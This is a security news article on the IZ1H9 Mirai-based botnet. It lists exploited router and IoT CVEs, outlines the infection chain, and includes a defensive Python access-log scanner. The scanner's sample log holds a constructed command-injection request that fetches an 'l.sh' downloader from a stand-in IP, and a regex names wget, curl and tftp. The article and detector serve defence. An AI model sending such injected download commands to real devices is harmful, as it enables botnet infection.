Mirai-Based DDoS Malware Variant Expands Targets with 13 Router Exploits
The Mirai-based DDoS botnet known as IZ1H9 has recently become active again, adding 13 new exploit payloads that target Linux-based routers and IoT devices from D-Link, Zyxel, TP-Link, TOTOLINK, and other vendors.
According to security researchers at Fortinet, IZ1H9 exploitation activity reached a historic peak during the first week of September, with tens of thousands of exploit attempts against vulnerable devices. Once it successfully infiltrates a victim’s device, IZ1H9 adds it to the DDoS botnet and uses it to launch DDoS attacks on specified targets.
As we know, the more devices and vulnerabilities a DDoS malware targets, the greater the likelihood of establishing a large and powerful botnet to launch massive attacks on targeted websites. In the case of IZ1H9, Fortinet’s report states that it exploits multiple vulnerabilities dating from 2015 to 2023, including:
– D-Link devices: CVE-2015-1187, CVE-2016-20017, CVE-2020-25506, CVE-2021-45382
– Netis WF2419: CVE-2019-19356
– Sunhillo SureLine (prior to version 8.7.0.1.1): CVE-2021-36380
– Geutebruck products: CVE-2021-33544, CVE-2021-33548, CVE-2021-33549, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
– Yealink Device Management (DM) 3.6.0.20: CVE-2021-27561, CVE-2021-27562
– Zyxel EMG3525/VMG1312 (prior to V5.50): no CVE specified; the exploit targets a vulnerability in the /bin/zhttpd/ component of Zyxel devices
– TP-Link Archer AX21 (AX1800): CVE-2023-1389
– Korenix JetWave wireless AP: CVE-2023-23295
– TOTOLINK routers: CVE-2022-40475, CVE-2022-25080, CVE-2022-25079, CVE-2022-25081, CVE-2022-25082, CVE-2022-25078, CVE-2022-25084, CVE-2022-25077, CVE-2022-25076, CVE-2022-38511, CVE-2022-25075, CVE-2022-25083
IZ1H9’s network attack campaign also targets a vulnerability associated with the “/cgi-bin/login.cgi” route, which could affect Prolink PRC2402M routers.
Once one of these vulnerabilities is exploited, the IZ1H9 payload is injected into the victim’s device; it contains a command to download a shell-script downloader named “l.sh” from a specified URL. When the script runs, it deletes logs to conceal the malicious activity and then retrieves bot clients customized for different system architectures.
Finally, the script modifies the device’s iptables rules to block connections on specific ports, making it harder for device administrators to remove the malware.
Once all these operations are complete, the IZ1H9 bot establishes communication with the command-and-control (C2) server and awaits instructions. The supported commands reportedly cover several types of DDoS attack, including UDP, UDP Plain, HTTP Flood, and TCP SYN.
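A defender-side check built from the details above, added here as an example and not code from the article or Fortinet’s report: it scans web-server access logs for requests to the two routes named in the campaign and for attempts to stage a downloader named “l.sh”, then counts hits per source address. The log lines, IP addresses and the exact regexes are constructed assumptions, not indicators from the report.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Routes the report names as targeted by IZ1H9 exploit attempts.
WATCHED_ROUTES = ("/cgi-bin/login.cgi", "/bin/zhttpd/")
# The campaign stages a downloader script named l.sh; flag requests that try
# to fetch a file by that name with a download utility (pattern is an assumption).
DOWNLOADER_RE = re.compile(r"\b(wget|curl|tftp)\b.*\bl\.sh\b", re.IGNORECASE)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines in common log format (not taken from the report).
SAMPLE_LOG = """\
203.0.113.5 - - [05/Sep/2023:10:01:02 +0000] "GET /cgi-bin/login.cgi?cmd=wget%20http%3A%2F%2F192.0.2.10%2Fl.sh HTTP/1.1" 200 512
198.51.100.7 - - [05/Sep/2023:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024
203.0.113.5 - - [05/Sep/2023:10:02:10 +0000] "POST /bin/zhttpd/ HTTP/1.1" 404 0
198.51.100.9 - - [05/Sep/2023:10:03:00 +0000] "GET /cgi-bin/login.cgi HTTP/1.1" 200 300
"""

def parse_line(line):
    """Parse one access-log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Return the indicator tags that apply to one parsed log entry."""
    tags = []
    target = unquote(entry["target"])          # decode %20, %2F etc. before matching
    if target.split("?", 1)[0] in WATCHED_ROUTES:
        tags.append("watched_route")
    if DOWNLOADER_RE.search(target):
        tags.append("downloader_fetch")
    return tags

def scan(log_text):
    """Return (findings, hits_per_ip): flagged entries and a count per source address."""
    findings, hits = [], Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            findings.append((entry["ip"], entry["target"], tags))
            hits[entry["ip"]] += 1
    return findings, hits

if __name__ == "__main__":
    found, per_ip = scan(SAMPLE_LOG)
    for ip, target, tags in found:
        print(f"{ip} {target} -> {', '.join(tags)}")
    print("hits per source:", dict(per_ip))
```

A bare “watched_route” hit can also be a legitimate login on a device that exposes that path, so treat the “downloader_fetch” tag and a high per-source count as the stronger signals.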
Fortinet’s report also notes that the data section of IZ1H9 contains hard-coded credentials used for brute-force attacks. These attacks could potentially spread the infection to adjacent devices within the target network or authenticate against unsecured IoT devices.
In conclusion, cybersecurity experts recommend that IoT device owners use strong administrative credentials and update their devices to the latest available firmware. They should also avoid exposing devices to the public internet whenever possible.
Source:
Bleeping Computer. “Mirai DDoS Malware Variant Expands Targets with 13 Router Exploits.” [Link]